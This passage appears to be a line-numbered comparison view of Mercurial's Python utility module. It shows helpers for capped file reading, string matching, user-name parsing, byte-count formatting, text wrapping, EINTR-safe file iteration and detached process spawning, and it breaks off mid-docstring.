2238 class cappedreader(object):
2247 class cappedreader(object):
2239 """A file object proxy that allows reading up to N bytes.
2248 """A file object proxy that allows reading up to N bytes.
2240
2249
2241 Given a source file object, instances of this type allow reading up to
2250 Given a source file object, instances of this type allow reading up to
2242 N bytes from that source file object. Attempts to read past the allowed
2251 N bytes from that source file object. Attempts to read past the allowed
2243 limit are treated as EOF.
2252 limit are treated as EOF.
2244
2253
2245 It is assumed that I/O is not performed on the original file object
2254 It is assumed that I/O is not performed on the original file object
2246 in addition to I/O that is performed by this instance. If there is,
2255 in addition to I/O that is performed by this instance. If there is,
2247 state tracking will get out of sync and unexpected results will ensue.
2256 state tracking will get out of sync and unexpected results will ensue.
2248 """
2257 """
2249 def __init__(self, fh, limit):
2258 def __init__(self, fh, limit):
2250 """Allow reading up to <limit> bytes from <fh>."""
2259 """Allow reading up to <limit> bytes from <fh>."""
2251 self._fh = fh
2260 self._fh = fh
2252 self._left = limit
2261 self._left = limit
2253
2262
2254 def read(self, n=-1):
2263 def read(self, n=-1):
2255 if not self._left:
2264 if not self._left:
2256 return b''
2265 return b''
2257
2266
2258 if n < 0:
2267 if n < 0:
2259 n = self._left
2268 n = self._left
2260
2269
2261 data = self._fh.read(min(n, self._left))
2270 data = self._fh.read(min(n, self._left))
2262 self._left -= len(data)
2271 self._left -= len(data)
2263 assert self._left >= 0
2272 assert self._left >= 0
2264
2273
2265 return data
2274 return data
2266
2275
2267 def stringmatcher(pattern, casesensitive=True):
2276 def stringmatcher(pattern, casesensitive=True):
2268 """
2277 """
2269 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2278 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2270 returns the matcher name, pattern, and matcher function.
2279 returns the matcher name, pattern, and matcher function.
2271 missing or unknown prefixes are treated as literal matches.
2280 missing or unknown prefixes are treated as literal matches.
2272
2281
2273 helper for tests:
2282 helper for tests:
2274 >>> def test(pattern, *tests):
2283 >>> def test(pattern, *tests):
2275 ... kind, pattern, matcher = stringmatcher(pattern)
2284 ... kind, pattern, matcher = stringmatcher(pattern)
2276 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2285 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2277 >>> def itest(pattern, *tests):
2286 >>> def itest(pattern, *tests):
2278 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2287 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2279 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2288 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2280
2289
2281 exact matching (no prefix):
2290 exact matching (no prefix):
2282 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2291 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2283 ('literal', 'abcdefg', [False, False, True])
2292 ('literal', 'abcdefg', [False, False, True])
2284
2293
2285 regex matching ('re:' prefix)
2294 regex matching ('re:' prefix)
2286 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2295 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2287 ('re', 'a.+b', [False, False, True])
2296 ('re', 'a.+b', [False, False, True])
2288
2297
2289 force exact matches ('literal:' prefix)
2298 force exact matches ('literal:' prefix)
2290 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2299 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2291 ('literal', 're:foobar', [False, True])
2300 ('literal', 're:foobar', [False, True])
2292
2301
2293 unknown prefixes are ignored and treated as literals
2302 unknown prefixes are ignored and treated as literals
2294 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2303 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2295 ('literal', 'foo:bar', [False, False, True])
2304 ('literal', 'foo:bar', [False, False, True])
2296
2305
2297 case insensitive regex matches
2306 case insensitive regex matches
2298 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2307 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2299 ('re', 'A.+b', [False, False, True])
2308 ('re', 'A.+b', [False, False, True])
2300
2309
2301 case insensitive literal matches
2310 case insensitive literal matches
2302 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2311 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2303 ('literal', 'ABCDEFG', [False, False, True])
2312 ('literal', 'ABCDEFG', [False, False, True])
2304 """
2313 """
2305 if pattern.startswith('re:'):
2314 if pattern.startswith('re:'):
2306 pattern = pattern[3:]
2315 pattern = pattern[3:]
2307 try:
2316 try:
2308 flags = 0
2317 flags = 0
2309 if not casesensitive:
2318 if not casesensitive:
2310 flags = remod.I
2319 flags = remod.I
2311 regex = remod.compile(pattern, flags)
2320 regex = remod.compile(pattern, flags)
2312 except remod.error as e:
2321 except remod.error as e:
2313 raise error.ParseError(_('invalid regular expression: %s')
2322 raise error.ParseError(_('invalid regular expression: %s')
2314 % e)
2323 % e)
2315 return 're', pattern, regex.search
2324 return 're', pattern, regex.search
2316 elif pattern.startswith('literal:'):
2325 elif pattern.startswith('literal:'):
2317 pattern = pattern[8:]
2326 pattern = pattern[8:]
2318
2327
2319 match = pattern.__eq__
2328 match = pattern.__eq__
2320
2329
2321 if not casesensitive:
2330 if not casesensitive:
2322 ipat = encoding.lower(pattern)
2331 ipat = encoding.lower(pattern)
2323 match = lambda s: ipat == encoding.lower(s)
2332 match = lambda s: ipat == encoding.lower(s)
2324 return 'literal', pattern, match
2333 return 'literal', pattern, match
2325
2334
2326 def shortuser(user):
2335 def shortuser(user):
2327 """Return a short representation of a user name or email address."""
2336 """Return a short representation of a user name or email address."""
2328 f = user.find('@')
2337 f = user.find('@')
2329 if f >= 0:
2338 if f >= 0:
2330 user = user[:f]
2339 user = user[:f]
2331 f = user.find('<')
2340 f = user.find('<')
2332 if f >= 0:
2341 if f >= 0:
2333 user = user[f + 1:]
2342 user = user[f + 1:]
2334 f = user.find(' ')
2343 f = user.find(' ')
2335 if f >= 0:
2344 if f >= 0:
2336 user = user[:f]
2345 user = user[:f]
2337 f = user.find('.')
2346 f = user.find('.')
2338 if f >= 0:
2347 if f >= 0:
2339 user = user[:f]
2348 user = user[:f]
2340 return user
2349 return user
2341
2350
2342 def emailuser(user):
2351 def emailuser(user):
2343 """Return the user portion of an email address."""
2352 """Return the user portion of an email address."""
2344 f = user.find('@')
2353 f = user.find('@')
2345 if f >= 0:
2354 if f >= 0:
2346 user = user[:f]
2355 user = user[:f]
2347 f = user.find('<')
2356 f = user.find('<')
2348 if f >= 0:
2357 if f >= 0:
2349 user = user[f + 1:]
2358 user = user[f + 1:]
2350 return user
2359 return user
2351
2360
2352 def email(author):
2361 def email(author):
2353 '''get email of author.'''
2362 '''get email of author.'''
2354 r = author.find('>')
2363 r = author.find('>')
2355 if r == -1:
2364 if r == -1:
2356 r = None
2365 r = None
2357 return author[author.find('<') + 1:r]
2366 return author[author.find('<') + 1:r]
2358
2367
2359 def ellipsis(text, maxlength=400):
2368 def ellipsis(text, maxlength=400):
2360 """Trim string to at most maxlength (default: 400) columns in display."""
2369 """Trim string to at most maxlength (default: 400) columns in display."""
2361 return encoding.trim(text, maxlength, ellipsis='...')
2370 return encoding.trim(text, maxlength, ellipsis='...')
2362
2371
2363 def unitcountfn(*unittable):
2372 def unitcountfn(*unittable):
2364 '''return a function that renders a readable count of some quantity'''
2373 '''return a function that renders a readable count of some quantity'''
2365
2374
2366 def go(count):
2375 def go(count):
2367 for multiplier, divisor, format in unittable:
2376 for multiplier, divisor, format in unittable:
2368 if abs(count) >= divisor * multiplier:
2377 if abs(count) >= divisor * multiplier:
2369 return format % (count / float(divisor))
2378 return format % (count / float(divisor))
2370 return unittable[-1][2] % count
2379 return unittable[-1][2] % count
2371
2380
2372 return go
2381 return go
2373
2382
2374 def processlinerange(fromline, toline):
2383 def processlinerange(fromline, toline):
2375 """Check that linerange <fromline>:<toline> makes sense and return a
2384 """Check that linerange <fromline>:<toline> makes sense and return a
2376 0-based range.
2385 0-based range.
2377
2386
2378 >>> processlinerange(10, 20)
2387 >>> processlinerange(10, 20)
2379 (9, 20)
2388 (9, 20)
2380 >>> processlinerange(2, 1)
2389 >>> processlinerange(2, 1)
2381 Traceback (most recent call last):
2390 Traceback (most recent call last):
2382 ...
2391 ...
2383 ParseError: line range must be positive
2392 ParseError: line range must be positive
2384 >>> processlinerange(0, 5)
2393 >>> processlinerange(0, 5)
2385 Traceback (most recent call last):
2394 Traceback (most recent call last):
2386 ...
2395 ...
2387 ParseError: fromline must be strictly positive
2396 ParseError: fromline must be strictly positive
2388 """
2397 """
2389 if toline - fromline < 0:
2398 if toline - fromline < 0:
2390 raise error.ParseError(_("line range must be positive"))
2399 raise error.ParseError(_("line range must be positive"))
2391 if fromline < 1:
2400 if fromline < 1:
2392 raise error.ParseError(_("fromline must be strictly positive"))
2401 raise error.ParseError(_("fromline must be strictly positive"))
2393 return fromline - 1, toline
2402 return fromline - 1, toline
2394
2403
2395 bytecount = unitcountfn(
2404 bytecount = unitcountfn(
2396 (100, 1 << 30, _('%.0f GB')),
2405 (100, 1 << 30, _('%.0f GB')),
2397 (10, 1 << 30, _('%.1f GB')),
2406 (10, 1 << 30, _('%.1f GB')),
2398 (1, 1 << 30, _('%.2f GB')),
2407 (1, 1 << 30, _('%.2f GB')),
2399 (100, 1 << 20, _('%.0f MB')),
2408 (100, 1 << 20, _('%.0f MB')),
2400 (10, 1 << 20, _('%.1f MB')),
2409 (10, 1 << 20, _('%.1f MB')),
2401 (1, 1 << 20, _('%.2f MB')),
2410 (1, 1 << 20, _('%.2f MB')),
2402 (100, 1 << 10, _('%.0f KB')),
2411 (100, 1 << 10, _('%.0f KB')),
2403 (10, 1 << 10, _('%.1f KB')),
2412 (10, 1 << 10, _('%.1f KB')),
2404 (1, 1 << 10, _('%.2f KB')),
2413 (1, 1 << 10, _('%.2f KB')),
2405 (1, 1, _('%.0f bytes')),
2414 (1, 1, _('%.0f bytes')),
2406 )
2415 )
2407
2416
2408 # Matches a single EOL which can either be a CRLF where repeated CR
2417 # Matches a single EOL which can either be a CRLF where repeated CR
2409 # are removed or a LF. We do not care about old Macintosh files, so a
2418 # are removed or a LF. We do not care about old Macintosh files, so a
2410 # stray CR is an error.
2419 # stray CR is an error.
2411 _eolre = remod.compile(br'\r*\n')
2420 _eolre = remod.compile(br'\r*\n')
2412
2421
2413 def tolf(s):
2422 def tolf(s):
2414 return _eolre.sub('\n', s)
2423 return _eolre.sub('\n', s)
2415
2424
2416 def tocrlf(s):
2425 def tocrlf(s):
2417 return _eolre.sub('\r\n', s)
2426 return _eolre.sub('\r\n', s)
2418
2427
2419 if pycompat.oslinesep == '\r\n':
2428 if pycompat.oslinesep == '\r\n':
2420 tonativeeol = tocrlf
2429 tonativeeol = tocrlf
2421 fromnativeeol = tolf
2430 fromnativeeol = tolf
2422 else:
2431 else:
2423 tonativeeol = pycompat.identity
2432 tonativeeol = pycompat.identity
2424 fromnativeeol = pycompat.identity
2433 fromnativeeol = pycompat.identity
2425
2434
2426 def escapestr(s):
2435 def escapestr(s):
2427 # call underlying function of s.encode('string_escape') directly for
2436 # call underlying function of s.encode('string_escape') directly for
2428 # Python 3 compatibility
2437 # Python 3 compatibility
2429 return codecs.escape_encode(s)[0]
2438 return codecs.escape_encode(s)[0]
2430
2439
2431 def unescapestr(s):
2440 def unescapestr(s):
2432 return codecs.escape_decode(s)[0]
2441 return codecs.escape_decode(s)[0]
2433
2442
2434 def forcebytestr(obj):
2443 def forcebytestr(obj):
2435 """Portably format an arbitrary object (e.g. exception) into a byte
2444 """Portably format an arbitrary object (e.g. exception) into a byte
2436 string."""
2445 string."""
2437 try:
2446 try:
2438 return pycompat.bytestr(obj)
2447 return pycompat.bytestr(obj)
2439 except UnicodeEncodeError:
2448 except UnicodeEncodeError:
2440 # non-ascii string, may be lossy
2449 # non-ascii string, may be lossy
2441 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2450 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2442
2451
2443 def uirepr(s):
2452 def uirepr(s):
2444 # Avoid double backslash in Windows path repr()
2453 # Avoid double backslash in Windows path repr()
2445 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2454 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2446
2455
2447 # delay import of textwrap
2456 # delay import of textwrap
2448 def MBTextWrapper(**kwargs):
2457 def MBTextWrapper(**kwargs):
2449 class tw(textwrap.TextWrapper):
2458 class tw(textwrap.TextWrapper):
2450 """
2459 """
2451 Extend TextWrapper for width-awareness.
2460 Extend TextWrapper for width-awareness.
2452
2461
2453 Neither number of 'bytes' in any encoding nor 'characters' is
2462 Neither number of 'bytes' in any encoding nor 'characters' is
2454 appropriate to calculate terminal columns for specified string.
2463 appropriate to calculate terminal columns for specified string.
2455
2464
2456 Original TextWrapper implementation uses built-in 'len()' directly,
2465 Original TextWrapper implementation uses built-in 'len()' directly,
2457 so overriding is needed to use width information of each characters.
2466 so overriding is needed to use width information of each characters.
2458
2467
2459 In addition, characters classified into 'ambiguous' width are
2468 In addition, characters classified into 'ambiguous' width are
2460 treated as wide in East Asian area, but as narrow in other.
2469 treated as wide in East Asian area, but as narrow in other.
2461
2470
2462 This requires use decision to determine width of such characters.
2471 This requires use decision to determine width of such characters.
2463 """
2472 """
2464 def _cutdown(self, ucstr, space_left):
2473 def _cutdown(self, ucstr, space_left):
2465 l = 0
2474 l = 0
2466 colwidth = encoding.ucolwidth
2475 colwidth = encoding.ucolwidth
2467 for i in xrange(len(ucstr)):
2476 for i in xrange(len(ucstr)):
2468 l += colwidth(ucstr[i])
2477 l += colwidth(ucstr[i])
2469 if space_left < l:
2478 if space_left < l:
2470 return (ucstr[:i], ucstr[i:])
2479 return (ucstr[:i], ucstr[i:])
2471 return ucstr, ''
2480 return ucstr, ''
2472
2481
2473 # overriding of base class
2482 # overriding of base class
2474 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2483 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2475 space_left = max(width - cur_len, 1)
2484 space_left = max(width - cur_len, 1)
2476
2485
2477 if self.break_long_words:
2486 if self.break_long_words:
2478 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2487 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2479 cur_line.append(cut)
2488 cur_line.append(cut)
2480 reversed_chunks[-1] = res
2489 reversed_chunks[-1] = res
2481 elif not cur_line:
2490 elif not cur_line:
2482 cur_line.append(reversed_chunks.pop())
2491 cur_line.append(reversed_chunks.pop())
2483
2492
2484 # this overriding code is imported from TextWrapper of Python 2.6
2493 # this overriding code is imported from TextWrapper of Python 2.6
2485 # to calculate columns of string by 'encoding.ucolwidth()'
2494 # to calculate columns of string by 'encoding.ucolwidth()'
2486 def _wrap_chunks(self, chunks):
2495 def _wrap_chunks(self, chunks):
2487 colwidth = encoding.ucolwidth
2496 colwidth = encoding.ucolwidth
2488
2497
2489 lines = []
2498 lines = []
2490 if self.width <= 0:
2499 if self.width <= 0:
2491 raise ValueError("invalid width %r (must be > 0)" % self.width)
2500 raise ValueError("invalid width %r (must be > 0)" % self.width)
2492
2501
2493 # Arrange in reverse order so items can be efficiently popped
2502 # Arrange in reverse order so items can be efficiently popped
2494 # from a stack of chucks.
2503 # from a stack of chucks.
2495 chunks.reverse()
2504 chunks.reverse()
2496
2505
2497 while chunks:
2506 while chunks:
2498
2507
2499 # Start the list of chunks that will make up the current line.
2508 # Start the list of chunks that will make up the current line.
2500 # cur_len is just the length of all the chunks in cur_line.
2509 # cur_len is just the length of all the chunks in cur_line.
2501 cur_line = []
2510 cur_line = []
2502 cur_len = 0
2511 cur_len = 0
2503
2512
2504 # Figure out which static string will prefix this line.
2513 # Figure out which static string will prefix this line.
2505 if lines:
2514 if lines:
2506 indent = self.subsequent_indent
2515 indent = self.subsequent_indent
2507 else:
2516 else:
2508 indent = self.initial_indent
2517 indent = self.initial_indent
2509
2518
2510 # Maximum width for this line.
2519 # Maximum width for this line.
2511 width = self.width - len(indent)
2520 width = self.width - len(indent)
2512
2521
2513 # First chunk on line is whitespace -- drop it, unless this
2522 # First chunk on line is whitespace -- drop it, unless this
2514 # is the very beginning of the text (i.e. no lines started yet).
2523 # is the very beginning of the text (i.e. no lines started yet).
2515 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2524 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2516 del chunks[-1]
2525 del chunks[-1]
2517
2526
2518 while chunks:
2527 while chunks:
2519 l = colwidth(chunks[-1])
2528 l = colwidth(chunks[-1])
2520
2529
2521 # Can at least squeeze this chunk onto the current line.
2530 # Can at least squeeze this chunk onto the current line.
2522 if cur_len + l <= width:
2531 if cur_len + l <= width:
2523 cur_line.append(chunks.pop())
2532 cur_line.append(chunks.pop())
2524 cur_len += l
2533 cur_len += l
2525
2534
2526 # Nope, this line is full.
2535 # Nope, this line is full.
2527 else:
2536 else:
2528 break
2537 break
2529
2538
2530 # The current line is full, and the next chunk is too big to
2539 # The current line is full, and the next chunk is too big to
2531 # fit on *any* line (not just this one).
2540 # fit on *any* line (not just this one).
2532 if chunks and colwidth(chunks[-1]) > width:
2541 if chunks and colwidth(chunks[-1]) > width:
2533 self._handle_long_word(chunks, cur_line, cur_len, width)
2542 self._handle_long_word(chunks, cur_line, cur_len, width)
2534
2543
2535 # If the last chunk on this line is all whitespace, drop it.
2544 # If the last chunk on this line is all whitespace, drop it.
2536 if (self.drop_whitespace and
2545 if (self.drop_whitespace and
2537 cur_line and cur_line[-1].strip() == r''):
2546 cur_line and cur_line[-1].strip() == r''):
2538 del cur_line[-1]
2547 del cur_line[-1]
2539
2548
2540 # Convert current line back to a string and store it in list
2549 # Convert current line back to a string and store it in list
2541 # of all lines (return value).
2550 # of all lines (return value).
2542 if cur_line:
2551 if cur_line:
2543 lines.append(indent + r''.join(cur_line))
2552 lines.append(indent + r''.join(cur_line))
2544
2553
2545 return lines
2554 return lines
2546
2555
2547 global MBTextWrapper
2556 global MBTextWrapper
2548 MBTextWrapper = tw
2557 MBTextWrapper = tw
2549 return tw(**kwargs)
2558 return tw(**kwargs)
2550
2559
2551 def wrap(line, width, initindent='', hangindent=''):
2560 def wrap(line, width, initindent='', hangindent=''):
2552 maxindent = max(len(hangindent), len(initindent))
2561 maxindent = max(len(hangindent), len(initindent))
2553 if width <= maxindent:
2562 if width <= maxindent:
2554 # adjust for weird terminal size
2563 # adjust for weird terminal size
2555 width = max(78, maxindent + 1)
2564 width = max(78, maxindent + 1)
2556 line = line.decode(pycompat.sysstr(encoding.encoding),
2565 line = line.decode(pycompat.sysstr(encoding.encoding),
2557 pycompat.sysstr(encoding.encodingmode))
2566 pycompat.sysstr(encoding.encodingmode))
2558 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2567 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2559 pycompat.sysstr(encoding.encodingmode))
2568 pycompat.sysstr(encoding.encodingmode))
2560 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2569 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2561 pycompat.sysstr(encoding.encodingmode))
2570 pycompat.sysstr(encoding.encodingmode))
2562 wrapper = MBTextWrapper(width=width,
2571 wrapper = MBTextWrapper(width=width,
2563 initial_indent=initindent,
2572 initial_indent=initindent,
2564 subsequent_indent=hangindent)
2573 subsequent_indent=hangindent)
2565 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2574 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2566
2575
2567 if (pyplatform.python_implementation() == 'CPython' and
2576 if (pyplatform.python_implementation() == 'CPython' and
2568 sys.version_info < (3, 0)):
2577 sys.version_info < (3, 0)):
2569 # There is an issue in CPython that some IO methods do not handle EINTR
2578 # There is an issue in CPython that some IO methods do not handle EINTR
2570 # correctly. The following table shows what CPython version (and functions)
2579 # correctly. The following table shows what CPython version (and functions)
2571 # are affected (buggy: has the EINTR bug, okay: otherwise):
2580 # are affected (buggy: has the EINTR bug, okay: otherwise):
2572 #
2581 #
2573 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2582 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2574 # --------------------------------------------------
2583 # --------------------------------------------------
2575 # fp.__iter__ | buggy | buggy | okay
2584 # fp.__iter__ | buggy | buggy | okay
2576 # fp.read* | buggy | okay [1] | okay
2585 # fp.read* | buggy | okay [1] | okay
2577 #
2586 #
2578 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2587 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2579 #
2588 #
2580 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2589 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2581 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2590 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2582 #
2591 #
2583 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2592 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2584 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2593 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2585 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2594 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2586 # fp.__iter__ but not other fp.read* methods.
2595 # fp.__iter__ but not other fp.read* methods.
2587 #
2596 #
2588 # On modern systems like Linux, the "read" syscall cannot be interrupted
2597 # On modern systems like Linux, the "read" syscall cannot be interrupted
2589 # when reading "fast" files like on-disk files. So the EINTR issue only
2598 # when reading "fast" files like on-disk files. So the EINTR issue only
2590 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2599 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2591 # files approximately as "fast" files and use the fast (unsafe) code path,
2600 # files approximately as "fast" files and use the fast (unsafe) code path,
2592 # to minimize the performance impact.
2601 # to minimize the performance impact.
2593 if sys.version_info >= (2, 7, 4):
2602 if sys.version_info >= (2, 7, 4):
2594 # fp.readline deals with EINTR correctly, use it as a workaround.
2603 # fp.readline deals with EINTR correctly, use it as a workaround.
2595 def _safeiterfile(fp):
2604 def _safeiterfile(fp):
2596 return iter(fp.readline, '')
2605 return iter(fp.readline, '')
2597 else:
2606 else:
2598 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2607 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2599 # note: this may block longer than necessary because of bufsize.
2608 # note: this may block longer than necessary because of bufsize.
2600 def _safeiterfile(fp, bufsize=4096):
2609 def _safeiterfile(fp, bufsize=4096):
2601 fd = fp.fileno()
2610 fd = fp.fileno()
2602 line = ''
2611 line = ''
2603 while True:
2612 while True:
2604 try:
2613 try:
2605 buf = os.read(fd, bufsize)
2614 buf = os.read(fd, bufsize)
2606 except OSError as ex:
2615 except OSError as ex:
2607 # os.read only raises EINTR before any data is read
2616 # os.read only raises EINTR before any data is read
2608 if ex.errno == errno.EINTR:
2617 if ex.errno == errno.EINTR:
2609 continue
2618 continue
2610 else:
2619 else:
2611 raise
2620 raise
2612 line += buf
2621 line += buf
2613 if '\n' in buf:
2622 if '\n' in buf:
2614 splitted = line.splitlines(True)
2623 splitted = line.splitlines(True)
2615 line = ''
2624 line = ''
2616 for l in splitted:
2625 for l in splitted:
2617 if l[-1] == '\n':
2626 if l[-1] == '\n':
2618 yield l
2627 yield l
2619 else:
2628 else:
2620 line = l
2629 line = l
2621 if not buf:
2630 if not buf:
2622 break
2631 break
2623 if line:
2632 if line:
2624 yield line
2633 yield line
2625
2634
2626 def iterfile(fp):
2635 def iterfile(fp):
2627 fastpath = True
2636 fastpath = True
2628 if type(fp) is file:
2637 if type(fp) is file:
2629 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2638 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2630 if fastpath:
2639 if fastpath:
2631 return fp
2640 return fp
2632 else:
2641 else:
2633 return _safeiterfile(fp)
2642 return _safeiterfile(fp)
2634 else:
2643 else:
2635 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2644 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2636 def iterfile(fp):
2645 def iterfile(fp):
2637 return fp
2646 return fp
2638
2647
2639 def iterlines(iterator):
2648 def iterlines(iterator):
2640 for chunk in iterator:
2649 for chunk in iterator:
2641 for line in chunk.splitlines():
2650 for line in chunk.splitlines():
2642 yield line
2651 yield line
2643
2652
2644 def expandpath(path):
2653 def expandpath(path):
2645 return os.path.expanduser(os.path.expandvars(path))
2654 return os.path.expanduser(os.path.expandvars(path))
2646
2655
2647 def hgcmd():
2656 def hgcmd():
2648 """Return the command used to execute current hg
2657 """Return the command used to execute current hg
2649
2658
2650 This is different from hgexecutable() because on Windows we want
2659 This is different from hgexecutable() because on Windows we want
2651 to avoid things opening new shell windows like batch files, so we
2660 to avoid things opening new shell windows like batch files, so we
2652 get either the python call or current executable.
2661 get either the python call or current executable.
2653 """
2662 """
2654 if mainfrozen():
2663 if mainfrozen():
2655 if getattr(sys, 'frozen', None) == 'macosx_app':
2664 if getattr(sys, 'frozen', None) == 'macosx_app':
2656 # Env variable set by py2app
2665 # Env variable set by py2app
2657 return [encoding.environ['EXECUTABLEPATH']]
2666 return [encoding.environ['EXECUTABLEPATH']]
2658 else:
2667 else:
2659 return [pycompat.sysexecutable]
2668 return [pycompat.sysexecutable]
2660 return gethgcmd()
2669 return gethgcmd()
2661
2670
2662 def rundetached(args, condfn):
2671 def rundetached(args, condfn):
2663 """Execute the argument list in a detached process.
2672 """Execute the argument list in a detached process.
2664
2673
2665 condfn is a callable which is called repeatedly and should return
2674 condfn is a callable which is called repeatedly and should return
2666 True once the child process is known to have started successfully.
2675 True once the child process is known to have started successfully.
2667 At this point, the child process PID is returned. If the child
2676 At this point, the child process PID is returned. If the child
2668 process fails to start or finishes before condfn() evaluates to
2677 process fails to start or finishes before condfn() evaluates to
2669 True, return -1.
2678 True, return -1.
2670 """
2679 """
2671 # Windows case is easier because the child process is either
2680 # Windows case is easier because the child process is either
2672 # successfully starting and validating the condition or exiting
2681 # successfully starting and validating the condition or exiting
2673 # on failure. We just poll on its PID. On Unix, if the child
2682 # on failure. We just poll on its PID. On Unix, if the child
2674 # process fails to start, it will be left in a zombie state until
2683 # process fails to start, it will be left in a zombie state until
2675 # the parent wait on it, which we cannot do since we expect a long
2684 # the parent wait on it, which we cannot do since we expect a long
2676 # running process on success. Instead we listen for SIGCHLD telling
2685 # running process on success. Instead we listen for SIGCHLD telling
2677 # us our child process terminated.
2686 # us our child process terminated.
2678 terminated = set()
2687 terminated = set()
2679 def handler(signum, frame):
2688 def handler(signum, frame):
2680 terminated.add(os.wait())
2689 terminated.add(os.wait())
2681 prevhandler = None
2690 prevhandler = None
2682 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2691 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2683 if SIGCHLD is not None:
2692 if SIGCHLD is not None:
2684 prevhandler = signal.signal(SIGCHLD, handler)
2693 prevhandler = signal.signal(SIGCHLD, handler)
2685 try:
2694 try:
2686 pid = spawndetached(args)
2695 pid = spawndetached(args)
2687 while not condfn():
2696 while not condfn():
2688 if ((pid in terminated or not testpid(pid))
2697 if ((pid in terminated or not testpid(pid))
2689 and not condfn()):
2698 and not condfn()):
2690 return -1
2699 return -1
2691 time.sleep(0.1)
2700 time.sleep(0.1)
2692 return pid
2701 return pid
2693 finally:
2702 finally:
2694 if prevhandler is not None:
2703 if prevhandler is not None:
2695 signal.signal(signal.SIGCHLD, prevhandler)
2704 signal.signal(signal.SIGCHLD, prevhandler)
2696
2705
2697 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2706 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2698 """Return the result of interpolating items in the mapping into string s.
2707 """Return the result of interpolating items in the mapping into string s.
2699
2708
2700 prefix is a single character string, or a two character string with
2709 prefix is a single character string, or a two character string with
2701 a backslash as the first character if the prefix needs to be escaped in
2710 a backslash as the first character if the prefix needs to be escaped in
2702 a regular expression.
2711 a regular expression.
2703
2712
2704 fn is an optional function that will be applied to the replacement text
2713 fn is an optional function that will be applied to the replacement text
2705 just before replacement.
2714 just before replacement.
2706
2715
2707 escape_prefix is an optional flag that allows using doubled prefix for
2716 escape_prefix is an optional flag that allows using doubled prefix for
2708 its escaping.
2717 its escaping.
2709 """
2718 """
2710 fn = fn or (lambda s: s)
2719 fn = fn or (lambda s: s)
2711 patterns = '|'.join(mapping.keys())
2720 patterns = '|'.join(mapping.keys())
2712 if escape_prefix:
2721 if escape_prefix:
2713 patterns += '|' + prefix
2722 patterns += '|' + prefix
2714 if len(prefix) > 1:
2723 if len(prefix) > 1:
2715 prefix_char = prefix[1:]
2724 prefix_char = prefix[1:]
2716 else:
2725 else:
2717 prefix_char = prefix
2726 prefix_char = prefix
2718 mapping[prefix_char] = prefix_char
2727 mapping[prefix_char] = prefix_char
2719 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2728 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2720 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2729 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2721
2730
2722 def getport(port):
2731 def getport(port):
2723 """Return the port for a given network service.
2732 """Return the port for a given network service.
2724
2733
2725 If port is an integer, it's returned as is. If it's a string, it's
2734 If port is an integer, it's returned as is. If it's a string, it's
2726 looked up using socket.getservbyname(). If there's no matching
